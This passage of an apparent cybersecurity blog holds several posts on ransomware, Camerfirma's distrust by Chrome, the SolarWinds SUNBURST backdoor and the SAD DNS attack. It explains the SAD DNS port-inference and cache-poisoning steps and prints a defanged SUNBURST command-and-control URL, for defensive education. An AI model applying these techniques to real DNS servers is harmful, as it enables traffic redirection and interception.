other systems from which to operate in case of emergency. Such as a USB key or tablets. He shut down the computer as soon as he suspected an attack. What he did wrong: He did not probe further into the nature of an SCR, which is an executable. Still, the context menu "test" did not help to make a decision. He did not have a list of accounts to change passwords in case of emergency. And yet, he was lucky. The quick password change was effective. It kept him from getting into his channel or his email. The one account he forgot, the one associated with his Android phone, suffered the attacker's wrath. It seems that he was very specifically looking to get into the channel and so getting to the phone did not provide him with a bounty to match. The clearest conclusions could be: Awareness-raising is not enough. Or, in other words, complete awareness is not enough, depending on how you look at it. At any time, all our digital identities or files can be compromised. Apart from backup, there is a need for a clear protocol to run from another system. It can be as simple as a list in a TXT and a series of URLs to change passwords to, but it is desirable that it exists, along with a clean boot system for a computer, if necessary..
November 11, 2021
Cyber Security
What On Earth Is Going on With Ransomware And Why We Won't Stop It Any Time Soon
In the last few months, it is not rare that every now and then we read about a large company that has fallen victim to ransomware, either brought to a halt or extorted. Anyone reading this has some recent examples in mind. A devastating epidemic that, let's face it, is not going to stop anytime soon. At least until, as with the viral pandemic we are also suffering from, we manage to coordinate all relevant forces globally. Let's look at the minimum necessary. Due to the global COVID pandemic, many have come to understand basic concepts that can be brought to cyber security. For instance, the importance of layered security and complementary mitigations (ventilation but also masks, hand washing but also social distance... even when vaccinated). In addition, we have questioned the concept of false sense of security (outdoor mask, is it really useful in all circumstances?). We have learned notions such as calculating the risks and benefits of applying some measure (potential side effects of a vaccine versus real risks of contagion) ... Perhaps with all this, the average user is more prepared to understand how complex problems such as ransomware require multiple complementary approaches once the severity of the threat is understood. Before understanding this, defence measures are likely to be erratic, incomplete, insufficient... A process of trial and error (we went through a phase of underestimating the danger of Coronavirus, initially emphasising the use of gloves until the focus shifted to masks as more research was done...). Did anyone believe that, with social distance and masks, we would end the pandemic by 2020? We suppose that (let's be honest) deep down we knew they were necessary, but not enough. We always hoped for vaccines, because we knew that something was missing in the equation to win the war. We were "defending" against the virus, but not yet "attacking" it as a strategy. And that is perhaps where we are now if we draw parallels with ransomware. Something else is missing. Something very similar happens in the field of security. The first thing is to have a good understanding of the risks... and this is what reality is forcing us to do with a great deal of discomfort. Then, we must propose mitigations that (again, let's be realistic) are not going to be effective on their own and in a short term. Because unless all strategies and actors work together globally, persistently and with the same level of maturity, the strategy will fail. Without that, we will continue to suffer more or less aggressive waves of attacks. They Are Way Ahead of Us The malware industry developed in the early 2000s, when cyber security was still called computer security and was just a thing for crazy people. They are way ahead of us when it comes to organising attacks and connecting them to the global crime industry. First, they tried to get rich with banking trojans and, when the breach was closed because the legitimate industry reacted, as we became more dependent on digitalisation, they turned to extortion, which has resulted in the magic formula they successfully explored and still maintain. First by locking users' screens, then by encrypting their files. Next, they moved on to hijacking SMEs, from there to large companies. From these to all kinds of organisations and finally to the critical infrastructures of a country, which is where we are now. No hesitation, they attack where the impact can put lives at risk or destabilise a country, wherever they know it is easier to get paid. In these circumstances, it doesn't seem so easy to follow the mantra of "don't pay".. Legitimate industry matures at a different pace, much more reactive. Although it may not seem like it, perhaps where we are best positioned is in terms of company awareness (no other chance) and, in a way, technical. We concentrate on patching and responding, auditing and certifying within our budgets. This will prevent many security problems. But attackers move faster at a technical level (against harder defences, more complex vulnerabilities exploited earlier and better) and there, we will always lose. We will not move fast enough against the ransomware industry if we don't get other actors on board as well. As it happened with the pandemic, what will change the rules of the game and make us bend the curve will not only be individual "technical" responsibility, but global coordination at the scientific, economic and legal levels... in other words, the equivalent of what has been achieved with the enormous global public-private and logistical effort that vaccines have meant, but in cyber. What Is the Vaccine For The Ransomware Epidemic? Everything counts, but the most important thing is to coordinate so that attackers do not find motivation in this type of attack. To discourage them technically (the cost of breaking into certain systems), economically (the benefit of extortion) and legally (the punishment if they are caught). How to strangle them from an economic point of view? By not paying? It is not that simple. AXA recently took a decision in France: cyber insurance coverage will cover certain damages but will not refund ransom money to clients who pay for extortion. Cyber insurers such as AXA have concluded that this clause normalised precisely the least traumatic of the exits: paying and giving in to extortion. And we also assume that it did not pay off with so many incidents. And normalising payment has not only made the insurance business unprofitable but has also fuelled the cybercrime industry itself. But what is the alternative for organisations that are forced to close down if they do not pay? Either they give in to extortion and feed the process that strengthens the attackers, or they resist payment and lose everything. In this respect, cyber insurers have yet to find a sustainable and viable model, their niche as a relevant player, insuring companies under a premise of minimum cyber security adoption and correctly adapting policies. Dynamise the industry to minimise the risk (so that they do not turn to their insurance so much) and in the worst-case scenario, effectively help in their recovery. On the legal side, Joe Biden recently signed an Executive Order to improve national cyber security and therefore efficiently protect the federal government's networks. The attack on pipeline operator Colonial Pipeline was the last drop. This executive order aims to update defences and will mean that companies will have to meet minimum standards. And just in case we were missing laws that would make it easier to prosecute attackers, identify them and impose global sanctions, progress was also made recently in this direction: ransomware will be treated as terrorism. Another way to discourage attackers. In short, the ransomware business must not only be tackled by preventing the financing of extortion, but also by improving the end-to-end security of companies and by effective laws that prosecute criminals with exemplary penalties. Easy to say, complex to orchestrate and implement. And Finally, Let's Not Forget That This Is a Global Problem Supply chains are a serious problem for cyber security. The SolarWinds incident made this clear. An interconnected world demands global measures at every step of the chain. As with vaccines, we are not all safe until we have all received our doses. When we know how to apply all these mitigations from different angles and the actors find their niche, we must also ensure that they are applied precisely by all relevant and minority actors globally. Even those who think it is not their problem (as happens in the US with random prizes for those who have been vaccinated, to motivate the anti-vaccine activists). This combination of global actors, approaching the problem from different angles and according to their capabilities, is the best vaccine against ransomware. Patience, it will not be solved in a short term because of the complexity of the situation... but it will happen. The necessary elements are already in place. Let us apply defensive techniques on the technical side, but also offensive ones on other levels. Download our new guide created in partnership with Palo Alto to help you prepare, plan, and respond to Ransomware attacks
June 14, 2021
Cyber Security
And the President Said, "Enough Is Enough". The New Cyber Security Proposals from The White House
Joe Biden has signed an Executive Order to improve national cyber security and protect federal government networks more efficiently. The attack on oil pipeline operator Colonial Pipeline, a story that made the mainstream media, was the last straw. Although the cybersecurity industry could sense that the ransomware would end up attacking critical infrastructure and causing chaos, it has taken the threat to materialise for a reaction to occur. And hopefully it will have beneficial consequences. Cyber security already has another game-changing attack in its history to remember. Negative events capable of changing the laws, the paradigm or the collective awareness of an industry can be counted on a single hand. In cyber security, perhaps (without wanting to complete all the cases) we can talk about Blaster and Sasser in 2003, which completely changed the perception of security at Microsoft, which was already quite damaged. Stuxnet in 2010 warned us about cyberweapons and made the world aware of the new cyber and geopolitical strategy. And of course, Wannacry in 2017, a blow to the industry's pride for being attacked at that point by a worm that exploited an already fixed vulnerability. And despite years of dealing with ransomware, it has taken years for the threat to materialise in an impact with serious consequences for the United States to tighten the rules. Because if we think about it, it was the next logical step in the escalation: from attacking users to hijacking SMEs, from SMEs to large companies, from these to organisations and from there, it was assumed, to critical infrastructures. But the incident (along with many others that have followed) has finally prompted the president to react. This executive order aims to modernise defences but above all to focus on a problem that can still, despite the seriousness of the situation, be mitigated. Fundamentally, the order aims to increase information sharing between the government and the private sector and to improve the ability to respond. The basic action points are: It allows private companies (especially those hosting servers) to share information with the government. This will speed up the investigation process when incidents occur involving access to a server. They also have a maximum time limit for reporting such incidents. Improve and adopt cyber security standards in the federal government. This is a commitment (at a high level, although specific technologies are mentioned) to adopt the best standards (2FA, cryptography, SDLC...) from within the government's own infrastructure. Improve supply chains, as the SolarWinds attack has taught us. Software sold to the government will have to meet minimum security requirements. There will be a kind of certificate of accreditation, similar to that for energy or emissions. A private and public cyber security review board or commission. When an accident occurs, it will be managed and conclusions will be drawn in a coordinated manner. This commission is inspired by the one already in place in aeronautics, where the private and public sector meet after major air incidents. A standard incident response system will be created both internally and externally. Companies will no longer have to wait for something to happen before they know what needs to be done. Improve the defence capability of the federal network. Perhaps the most generic measure, which aims to reinforce with appropriate cyber security tools the entire government infrastructure. Improving remediation and investigation capacity. Perhaps this comes down basically to improving logging systems. And now, What? This executive order will mean that companies will have to comply with minimum standards, procedures, audits... In short, it will create a healthier industry, one that is more closely monitored by itself. More robust and united, we hope. Something similar to what the debit and credit card companies did when they implemented the PCI-DSS initiative, which obliged everyone who worked with this data to pass a minimum audit. While it will not solve the problem entirely, it will significantly improve it. It puts the focus on cyber security at the highest level, joins forces and, as mentioned, attacks the problem from a political and legal perspective that complements the technical approach, which is insufficient on its own. However, there is still a lack of clearer laws against attackers which would make it easier to prosecute them, identify them and impose sanctions at a global level. There is now political and legal support to promote security from a technical point of view, but cyber is also legal, social, political... and the activity of attackers must be tackled from all these angles. Such a serious problem, although technical in nature, cannot be solved from only that angle. If we merely concentrate on patching and responding, auditing and certifying, we will not make enough progress. In any case, this order is great news and a first step in that direction.
June 4, 2021
Cyber Security
26 Reasons Why Chrome Does Not Trust the Spanish CA Camerfirma
From the imminent version 90, Chrome will show a certificate error when a user tries to access any website with a certificate signed by Camerfirma. Perhaps it is not the most popular CA, but it is very present in Spain in many public organisations, for example, in the Tax Agency. If this "banning" of Chrome is not solved for the income tax campaign, there may be problems accessing official websites. Many other organisations in Spain (including the COVID vaccination campaign website, vacunacovid.gob.es) also depend on the certificate. But what happened, and why exactly did Chrome stop trusting this CA? Microsoft and Mozilla still trust it, but of course Chrome's decision will create a chain effect that will most likely make it impossible to trust anything issued by this CA from the main operating systems or browsers. In other news regarding this issue, there has been talk of Camerfirma's failures and its inability to respond and solve them, but to be fair, we need to know a little about the world of certificates. The first thing is to understand that all CAs make mistakes: a lot of them, always. Just take a look at Bugzilla. The world of cryptography is extremely complex, and the world of certificates... as well. Following the requirements is not always easy, and that is why the CA/Forum organisation and many researchers are responsible for ensuring that the certification authorities function perfectly and comply strictly and rigorously with these standards, so they are very used to these failures, mistakes and oversights and tolerate problems to a certain extent as long as they are reversed in time and corrected. It is a question of showing willingness and efficiency in management, rather than being perfect. Incidents occur on a daily basis and are varied and complex, but CAs usually react by solving them and increasing vigilance, which improves the system on a daily basis. But sometimes, trust in a CA is lost because a certain limit is crossed in terms of its responses and reactions. In the case of Camerfirma, it seems that the key is that they have been making mistakes for years, some of them repeatedly, and that they have shown too many times that the remedies and resolution practices of this trusted authority cannot be trusted. Moreover, it seems that their excuses and explanations do not add up. Chrome's reaction thus demonstrates that cryptographic security must be taken seriously, and that it will not accept CAs that confess that they are understaffed, ignore specifications, etc. These moves are necessary. But with decisions like this, Chrome is on its way to becoming a de facto CA. We have already mentioned that traditional CAs are losing control of certificates. This could be one of the possible reasons why Chrome will have a new Root Store. 26 Reasons We will describe the reasons very briefly and in order of importance or relevance (subjective). The text in quotation marks is verbatim from what we have found in the Bugzilla tracker, which seems to gloat over the fragility of Camerfirma's excuses. To be honest, they have to be read in their full, particular context in order to understand them. But even so, what emerges on the one hand is a certain inability on the part of Camerfirma to do the job entrusted of being a serious CA capable of responding in time and form... and on the other, a significant weariness on the part of those who ensure that this is the case. One: In 2017, the world stopped trusting WoSign/StartCom as a CA for different reasons. Camerfirma still had a relationship with StartCom as a way to validate certain certificates, and it did so under the criteria of "other methods", which is the strangest (and last) way to achieve this and, therefore, raises suspicions. The CA/Forum did not want these "other methods" to be used (which came from an outdated specification) and did not want certificate validation to be delegated to StartCom. Camerfirma did not rectify the situation and continued the relationship with StartCom without making it clear how. Two: They did not respect the CAA standard. This DNS record should contain which CAs are the preferred CAs for a website. For example, I do not want CA X to issue a certificate for me ever... or I only want CA Y to issue certificates for my domain. Camerfirma thought that if certificate transparency existed, they could avoid respecting CAA standards, because "they were in a hurry and misunderstood the requirements". Three: OCSP responses (to quickly revoke) did not comply with the standards. Four: It was discovered that the Subject Alternative Names fields of many of their certificates were wrong. When they reported this to Camerfirma, they got no response, because these reports "went to only one person" who did not respond. Camerfirma never "intentionally" fixed certificates of this type and even after revoking some of them, Camerfirma reissued them incorrectly. Five: Intesa Sanpaolo, one of Camerfirma's sub-CAs, also made several mistakes when it came to timely revocation. It even issued a certificate for "com.com" by "human error". Six: They made certain revocations by mistake, confusing serial numbers in valid and invalid certificates. Camerfirma decided to do a "de-revocation", which is intolerable in the world of certificates, but they implemented it inconsistently. In the midst of all the trouble, they claimed that they would use EJBCA management software to mitigate this in the future, but then they didn't... then they confirmed that they would develop their own software with similar features. As not much more was heard about this afterwards, they claimed that they were in "daily meetings to discuss these issues". Seven: Camerfirma infringed a rule related to the inclusion of the issuer's name and serial number in the key ID field (you must not). All Camerfirma certificates had been doing this wrong since 2003. They claimed they had got it wrong and fixed it at the end of 2019. But they did not revoke the previous certificates issued. In 2020 they reissued certificates that infringed this policy, which they did not revoke either. Eight, nine and ten: They are not supposed to issue certificates with underscores in their names. According to a "human error" in their issuing and detection, they were not able to detect them in time and some of them were missed. It also happened with a domain name with the character ":". And with a domain that existed but they spelled it wrong in the certificate. Eleven: Camerfirma (and others) issued sub-CAs that could give OCSP responses for Camerfirma itself, because they had not included a suitable restriction in the certificate's EKUs (EKUs are fields to limit the certificate's power and use). They argued that they were not aware of this security flaw and did not revoke them in time. The reason for not revoking is that one of the sub-CAs was used in the healthcare smartcard sector and if they were to revoke them, these smartcards would have to be replaced. The problem was so important that they had to escalate the issue to higher bodies at a national level. On 2 October 2020, it appears that the keys on these cards were destroyed, but this destruction was neither supervised nor witnessed by a qualified auditor nor by Camerfirma itself. Twelve: They issued a subCA for the use in S/MIME to the government of Andorra, which they did not audit. When they did, it was found that they made quite a few mistakes. In the end they had to revoke it, and claimed that as they were TLS certificates, they thought they were outside the scope of the audits. Again, the problem seemed to be that they did not have sufficient and necessary staff. From thirteen to twenty-six: We have cheated here to put together all the other reasons that are very similar. For example, dozens of technical failures in other certificate fields that they were unable to revoke in time. And the excuses for this were varied. From the fact that local legislation obliged them to certain formulas that did not comply with the standards (things that they did not prove) ... to the fact that their system had worked well for 17 years, but then, as it grew too much, some internal controls failed. Sometimes there were no excuses. They just did not respond to requests. In one incident, they were supposed to disclose the existence of a sub-CA within a week of its creation, but they did not do it. What was happening according to them was that "the person in charge was not available". Neither was the person's back-up. Camerfirma tried to solve this by saying that they would put "a backup for the backup person in charge of this communication". To solve other problems, they claimed that their staff was completely " overloaded", or "on holiday". Basically, of all the common errors in many certificates (insufficient entropy, incorrect extensions...), Camerfirma always failed to revoke certificates in a time and form. Conclusions It is not easy to be a CA. Camerfirma is not the first or the last to be revoked. Even Symantec suffered a setback in this respect. FMNT also had a hard time getting Firefox to include its certificate in its repository and it took several years. At some points in this incredible story with FMNT, there is also a sense of downtime, where one senses a lack of adequate staff to meet Mozilla's demands. The world of certification is a demanding one. But it must be. The internet that has been built literally depends on the good work of the CAs. Tolerating the operation of a CA that deviates one millimetre from continuous vigilance, control and demand, or fails to respond in a timely manner, is like allowing condescension towards a policeman or a judge who commits any hint of corruption. It should not be tolerated for our own sake and because of the significant consequences it would entail.
February 1, 2021
Cyber Security
The Attack on SolarWinds Reveals Two Nightmares: What Has Been Done Right and What Has Been Done Wrong
All cyber security professionals now know at least part of what was originally thought to be "just" an attack on SolarWinds, which has just truned out to be one of the most interesting operations of recent years. We will dwell on the more curious details of the incident, but we will also focus on the management of this crisis. What has been done right and what has been done wrong to gauge the maturity of an industry that will suffer more and worse attakcs than this in the future FireEye raises the alarm on Tuesday 8 December. They have been attacked. But the industry does not blame FireEye for this, but backs them up and supports them in general, their response is exemplary. It has happened to many and it can happen to all of us, so the important thing is how you deal with it and be resilient. Since attackers have access to sensitive tools internal to their company, FireEye does something for the industry that honours them: they publish the Yara rules necessary to detect whether someone is using those tools stolen from the FireEye offensive team against a company. A fine gesture that is again publicly credited. Not much more is known about the incident and it is still being investigated. But then everything gets complicated, and in a massive way. The news begins: The US Treasury Department and many other government departments also admit an attack. On the same day, the 13th, FireEye offers a very important detail: the problem lies in the Trojanization of SolarWinds' Orion software. An upgrade package, signed by SolarWinds itself, included a backdoor. It is estimated that over 18,000 companies use this system. Pandora's box is opened because of the characteristics of the attack and because it is a software used in many large companies and governments. And since global problems require global and coordinated reactions, this is where something seemed to have gone completely wrong. Did the Coordination Fail? The next day, December 14, with the information needed to point at "ground zero" of the attack, the reactive methods still did not work. In particular: The trojanized package was still available in the SolarWinds repository even though on the 14th it had been known for at least a week (but most likely longer) that this package was trojanized and had to be removed. Antivirus engines were still unable to detect the malware (which has become known as SUNBURST). On that same Monday it was not found in the static signatures of the popular engines. The certificate with which the attackers signed the software was still not revoked. Whether they gained access to the private key or not (unknown), that certificate had to be revoked in case the attacker was able to sign other software on behalf of SolarWinds. Here we can only guess why this "reactive" element failed. Was SolarWinds late in the attack? Did FireEye publish the details to put pressure on SolarWindws when it was already clear that the attack concealed a much more complex offensive? Of course, the stock market has "punished" both companies differently, if it can be used as a quick method of assessing the market's reaction to a serious compromise. FireEye has turned out to be the hero. SolarWinds, the bad guy. However, there have been reactions that have worked, such as Microsoft hijacking the domain under which the whole attack is based (avsavmcloud.com). Which, by the way, was sent from Spain to urlscan.io manually on 8 July. Someone may have noticed something strange. The campaign had been active since March. Source: https://twitter.com/sshell_/status/1339745377759576065 The Malware itself and the Community The "good" thing about SUNBURST is that it is created in .NET language, making it relatively easy to decompile and know what the attacker has programmed. And so, the community began to analyse the software from top to bottom and program tools for a better understanding. The malware is extremely subtle. It did not start until about two weeks after it was found on the victim. It modified scheduled system tasks to be launched and then returned them to their original state. But one of the most interesting features of the malware is the ability to hide the domains it uses, which required brute force to reveal them (they were hashes). In addition, it contained the hash of other domains that it did not want to infect. But which ones? All, most likely, internal to the SolarWinds network, to go unnoticed in its internal network. An indication that the initial victim was SolarWinds and that in order to achieve this, the attackers had to know their victim well. A code was issued to pull out any tool list (their names were also hashed) to find out what the trojan didn't want to see on the machine. Many of the tools and hashed domains were revealed in record time and it was possible to recognise what these attackers had in mind. Another tool has been published to decrypt the DGA (Domain Generator Algorithm) where it tried to contact the malware. One of the strong points of the algorithm was precisely the DGA, but also its weak point (the top-level domain was always the same). Source: https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/ In the end, the malware ended up composing URLs like this: hxxps://3mu76044hgf7shjf[.]appsync-api[.]eu-west-1[.]avsvmcloud[.]com /swip/upd/Orion[.]Wireless[.]xml Where it "exfiltrated" the information and communicated with the Command and Control. Well thought out from the attacker's point of view because it goes unnoticed due to its "normality", but badly thought out from the perspective of persistence Another very interesting point that seems to have gone unnoticed, is that the attackers seemed to "inflate" during 2019 the trojan module from 500 to 900k, without injecting relevant code but increasing the size of the DLL. In February 2020 they introduced the espionage charge into the same DLL, thus achieving an extra invisibility without raising suspicions due to the increase in size. Don't Go Yet, There Is Still More More recently, it seems that Orion from SolarWinds was not only trojanized with SUNBURST but also with what has come to be called SUPERNOVA. Perhaps another actor also had the possibility to enter the network and deployed a different trojan in the tool. Although we still do not have many details of how it worked, this is the second nightmare that can still be talked about. Conclusions We are facing one of the most sophisticated attacks in recent times, which has not only put in check a company that is dedicated to defending other companies, but also governments, major ones like Microsoft and others that we cannot even imagine. They have gone one step further launching a campaign that is almost perfect in its impact and execution. On other occasions (the RSA, Bit9, Operation Aurora...), large companies have been attacked too and also sometimes only as a side effect in order to reach a third party, but on this occasion a step forward has been taken in the discretion, precision and "good work" of the attackers. And all thanks to a single fault, of course: the weakest point they have been able to detect in the supply chain on which major players depend. And yes, SolarWinds seemed a very weak link. On their website they recommended deactivating the antivirus (although this is unfortunately common for certain types of tools) and they have shown to use weak passwords in their operations, in addition to the fact that there are indications that they have been compromised for more than a year... twice Should we be surprised at such weak links in the cyber security chain on which so much depends? We depend on an admittedly patchy picture in terms of cyber security skills. Asymmetric in response, defence and prevention capabilities, both for victims and attackers... but very democratic in the importance of each piece in the industry. There is no choice but to respond in a coordinated and joint manner to mitigate the risk. It is not difficult to find similarities outside the field of cyber security. In any case, and fortunately, once again, the industry has shown itself to be mature and capable of responding jointly, not only by the community, but also by the major actors. Perhaps this is the positive message we can pull out of a story that still seems to be unfinished.
December 22, 2020
Cyber Security
Tell Me What Data You Request from Apple and I Will Tell You What Kind of Government You Are
We recently found out that Spain sent 1,353 government requests for access to Facebook user data in the first half of 2020. Thanks to Facebook's transparency report for the first half of 2020, we discovered that government requests for user data have risen from 140,875 to 173,592 worldwide. A few weeks ago, Apple published its report for the second half of 2019, which also shows what was requested in Spain and in other countries. Sometimes governments need to rely on large corporations to do their job. When a threat involves knowing the identity or having access to the data of a potential attacker or a victim in danger, the digital information stored by these companies can be vital to the investigation and to preventing a disaster. We have prepared some graphs to try to identify through this publication (which only contains number tables), what governments are most concerned about. Device Based Requests This table represents the device requests. For example, when law enforcement agencies act on behalf of customers from whom the device has been stolen or lost. It also receives requests related to fraud investigations, typically requesting details of Apple customers associated with Apple devices or connections to Apple services. From an IMEI to a serial number. In yellow those requested and in green those granted. Spain requested information on more than 2600 devices of which just over 2100 were granted. All in 1491 requests. In Germany, the problem of theft abounds to justify these requests. In the USA, repair-related fraud. Requests Based on Financial Data For example, when law enforcement act on behalf of customers who require assistance related to fraudulent credit card or gift card activity that has been used to purchase Apple products. Japan leads, followed by Germany and the United States. Normally, it is the USA the one that demands the most, although this second half of the year it has come in third place. Japan has shot up. In Spain they are almost all related to iTunes card fraud or credit card fraud. Account Based Requests Requests are made to Apple regarding accounts that may have been used in violation of the law and Apple's terms of use. These are iCloud or iTunes accounts and their name, address and even content in the cloud (backup, photos, contacts...) This is perhaps the most intrusive measure, in which Apple provides real private content. Usually China and the United States are the ones that request the most data, but this time Brazil cuts in. Apple has the power to refuse if it considers any failure in form or substance. It should be noted that Apple, in addition to providing the data, may provide "metadata" not directly related to the data, and this does not count as a "satisfied" request although it also includes providing information. Spain requested 73, of which 51 were granted. Emergency Requests Under the U.S. Electronic Communications Privacy Act (ECPA), Apple may be required to provide Private Account Information if, in an emergency, it believes that doing so may avoid a danger to life or serious harm to individuals. Interestingly, here the UK wins with over 400 accounts, followed by the United States. The rest of the countries make only dozens of requests, almost always satisfied. Spain, none. Does the UK care more about emergencies and limit itself to requesting data when that is the case? Requests Related to The Withdrawal of Apps from The Market It usually involves apps that allegedly violate the law. China continues to be the country that requests the withdrawal of most apps. Almost all related to pornography, illegal content and operating without a government license. The 18 requested in Austria and the 2 in Russia were related to illegal gambling. Of the 33 requested by Vietnam, none was withdrawn, related to gambling.
December 1, 2020
Cyber Security
A Simple Explanation About SAD DNS and Why It Is a Disaster (or a Blessing)
In 2008, Kaminsky shook the foundations of the Internet. A design flaw in the DNS made it possible to fake responses and send a victim wherever the attacker wanted. 12 years later, a similar and very interesting formula has been found to poison the cache of DNS servers. Even worse than Kaminsky's. Fundamentally because it does not need to be in the same network as the victim and because it has been announced when many servers, operating systems and programs are still not patched. Let's see how it works in an understandable way. In order to fake a DNS request and return a lie to the client, the attacker must know the TxID (transaction ID) and the UDP source port. This implies a 32-bit entropy (guess two 16-bit fields). SAD DNS consists (basically, because the paper is very complex) in inferring the UDP port through an ingenious method that uses ICMP error return messages. If the port is inferred, this again leaves an entropy of only the 16-bit TxID, assumable for an attack. Once you have these two data, you build the packet and bombard the name server. How to Infer the Open UDP Port The necessary preliminaries are that, due to the operation of UDP, the server opens some UDP response ports through which it communicates with other name servers. Knowing these ephemeral ports that open in its communications is vital because, together with the TxID, they mean everything that an attacker needs to fake the response. In other words, if a server (resolver or forwarder) asks a question to another server, it expects a specific TxID and UDP in its response. And whoever returns a packet with that data it will be taken as the absolute truth. He could be fooled by a false IP-domain resolution. It is only necessary that the attacker knows in this case the open UDP port, deduct the TxID by brute force and bomb his victim. When you contact a UDP port and ask if it is open or not, the servers return a "port closed" message in ICMP. To avoid overloading them with answers, they have an overall limit of 1000 per second. A global limit means that it doesn't matter if you are asked 100 or 10 servers at a time, for all of them you have 1000 answers in one second to open port questions, for example. This, which was done in order to avoid overloading the system, is what actually causes the whole problem. The overall limit is 1000 on Linux, 200 on Windows and FreeBSD and 250 on MacOS. And in reality, the whole paper is based on "reporting" this fixed global limit formula. It needs to be revised because the dangers of this have been warned about before, but never with such a practical attack and application. Also, important because not only DNS, but QUIC and HTTP/3, based on UDP, can be vulnerable. The attack is complex and at each step there are details to mitigate, but fundamentally the basic steps are (with potential inaccuracies for the sake of simplicity) the following: Send 1000 UDP probes to the victim resolver with faked source IPs testing 1000 ports. This is actually a batch of 50 every 20 ms to overcome another limit of responses per IP that the Linux operating system has. If all 1000 ports are closed, the victim will return (to the faked IPs) 1000 ICMP error packets indicating that the port is not open. If it is open, nothing happens, it is discarded by the corresponding application on that port. It doesn't matter that the attacker doesn't see the ICMP responses (they reach the faked IPs). What matters is to see how much of the global limit of 1000 responses per second is "used up" on that batch. Before letting that second pass, the attacker queries any UDP port that he knows is closed and if the server returns an ICMP of "closed port"... it is that he had not used up the 1000 ICPM of "closed port error" and therefore... in that range of 1000 there was at least one open port! Bingo. As the ICMP response limit is global, a single closed port response means that the limit of 1000 "closed port" responses per second was not used up. Some of them were open. This query is made from your real IP, not faked, to receive the real (or not) response. Thus, in batches of 1000 queries per second and by checking whether or not the limit of error packets port closed is used up, the attacker can deduce which ports are open. In a short time, he will have mapped the open ports of the server. Obviously, the attacker combines this with binary "intelligent" searches to optimize, dividing the ranges of "potentially open" ports in each batch to go faster and therefore find the specific data. The researchers also had to eliminate the "noise" from other open ports or scans being made to the system while the attacker is performing it, and in the paper, they explain some formulas to achieve this. More Failures and Problems It all comes from a perfect storm of failures in UDP implementation, in the implementation of the 1000 response limit... The above explanation is "simplistic" because the researchers detected other implementation problems that sometimes even benefited them, and some other times consisted of slight variations of the attack. Because the failure is not only in the implementation of the ICMP global limit. Neither is the implementation of UDP getting away with it itself. According to the RFC, on a single UDP socket, applications can receive connections from different source IPs on the same socket. The verifications on who is given what, is left in the RFC to the application handling the incoming connection. This, which is supposed to apply to servers (they are receiving sockets), also applies to clients. Thus, according to the experiments in the paper it also applies to the UDP client that opens ports for queries and therefore makes the attack much easier, allowing "open" ports to be scanned for queries with any source IP address. And something very important: what happens if in the UDP implementation the application marks a response UDP port as "private" so that only the initiator of the connection can connect to it (and others cannot see whether it is open or closed)? This would pose a problem for the first step of the attack in which the source IPs are faked and speed up the process. Opening "public" or "private" ports depends on the DNS server. And only BIND does this well. Dnsmask, Unbound, no. In these cases you cannot forge the IPs of the spurts (the ones used to use up the global limit and that you don't care whether you receive or not) but you can only forge the spurts with a single source IP. This would make the scan slower. But no problem. If it’s not like that and the ports are private, there is also a failure in Linux to "mitigate" it. The "global limit" verification is done before the limit count by IP. This, which at the beginning was done this way because checking the global limit is faster than checking the limit per IP, it actually allows it not to take so long and the technique remains valid even with the private ports. The paper continues with recommendations for forwards, resolvers... a thorough review of DNS security. Solutions? Linux already has a patch ready, but there's a lot of cutting to do. From DNSSEC, which is always recommended but never quite takes off, to disabling ICMP responses... which can be complex. The Kernel patch will now make it so that there is no fixed value of 1000 responses per second, but randomly between 500 and 2000. The attacker will therefore not be able to make his calculations correctly to know if in one second this limit has been used up and deduct open UDP ports. It seems that the absolute origin of the problem is implementation, not design. This RFC describes that response rate limit, and leaves it open to a number. Choosing it fixed and in 1000 as was done in the Kernel in 2014 is part of the problem. By the way, with this BlueCatLabs script programmed every minute, you will be able to mitigate the problem on a DNS server by doing by hand what the SAD DNS patch will do. So, let's wait for patches for everyone: the operating systems and the main DNS servers. Many public servers are already patched but many more are not. This attack is particularly interesting as it is very clean for the attacker, he does not need to be in the victim's network. He can do everything from the outside and confuse the servers. A disaster. Or a blessing. As for this, quite a few "loose ends" in the UDP and DNS protocol will be fixed.
November 16, 2020
Cyber Security
How Traditional CA's Are Losing Control of Certificates and Possible Reasons Why Chrome Will Have a New Root Store
It's all about trust. This phrase is valid in any field. Money, for example, is nothing more than a transfer of trust, because obviously we trust that for a piece of paper that is physically worthless, we can get goods and services. Confidence in surfing comes from root certificates. As long as we trust them, we know that our navigation is not being intervened and we can visit and introduce data in websites with certain guarantees. But who should we trust when choosing these root certificates? Do we trust those provided by the browser or those offered by the operating system? Google has made a move and wants to have its own Root Store system. At First It Was the CAB/Forum It is the forum of relevant Internet entities (mainly CAs and browsers). It votes and decides on the future of the use of certificates and TLS in general. Or not. Because this year we have seen how a relevant manufacturer has acted independently of the result of a vote and has unilaterally applied its own criteria. In 2019 they voted on whether to reduce the life span of TLS/SSL certificates to one year. The result was no. But it made no difference. The browsers took the floor. In February 2020, Safari unilaterally stated that it would mark certificates created for more than 398 days from 1 September as invalid. Firefox and Chrome followed suit. The vote among the parties involved (mainly CAs and browsers) was useless. Another example is how Chrome led in a certain way the "deprecation" of the certificates using SHA-1 by being more and more aesthetically aggressive with the validity of these certificates (red blades, alerts...) and sometimes without being aligned with the deadlines set by the CAB/Forum. Nothing bad really, it should not be misunderstood. Browsers can provide a certain agility in transitions. The problem is that the interests of the certification authorities, with a clear business plan, do not always coincide with those of the browsers (represented by companies with sometimes opposite interests). In the end, it seems that whoever is closest to the user calls the shots. There is no point in CA deciding to issue certificates with a duration of more than one year if the browser used by 60% of users is going to mark them as untrustworthy. Popularity, closeness to the user, is a value in itself that Chrome and others, exploit (as Internet Explorer did in its time) in order to impose "standards". The Root Store... Everyone Had Their Own and Now Chrome Wants One Windows has always had a Root Store with the root certificates it trusts. Internet Explorer, Edge feeds on it…and Apple and Android do exactly the same. The most popular browser with its independent Root Store was Firefox. And this, sometimes, caused problems. In 2016, Firefox was the first to stop trusting WoSign and StartCom because it did not trust their practices. The rest followed immediately. On the other hand, in 2018, Apple, Google and Firefox stopped trusting Symantec certificates. They used traditional blocking (by various means) and not necessarily by stopping to include them in their Root Store. In general, browsers were moving in this direction. If Edge wanted to stop relying on something, Microsoft would take care of it in Windows. If it was Safari, Apple would remove it from the Root Store Mac and the iPhone. If Chrome wanted to control who to trust, it could do so on Android, but... what about Chrome on Windows, on Mac, iPhone... and Chrome on Linux? That piece was missing from the puzzle and made it dependent on the criteria of a third party. Now Chrome wants its own Root Store, so it doesn't have to depend on anyone. In its statement where 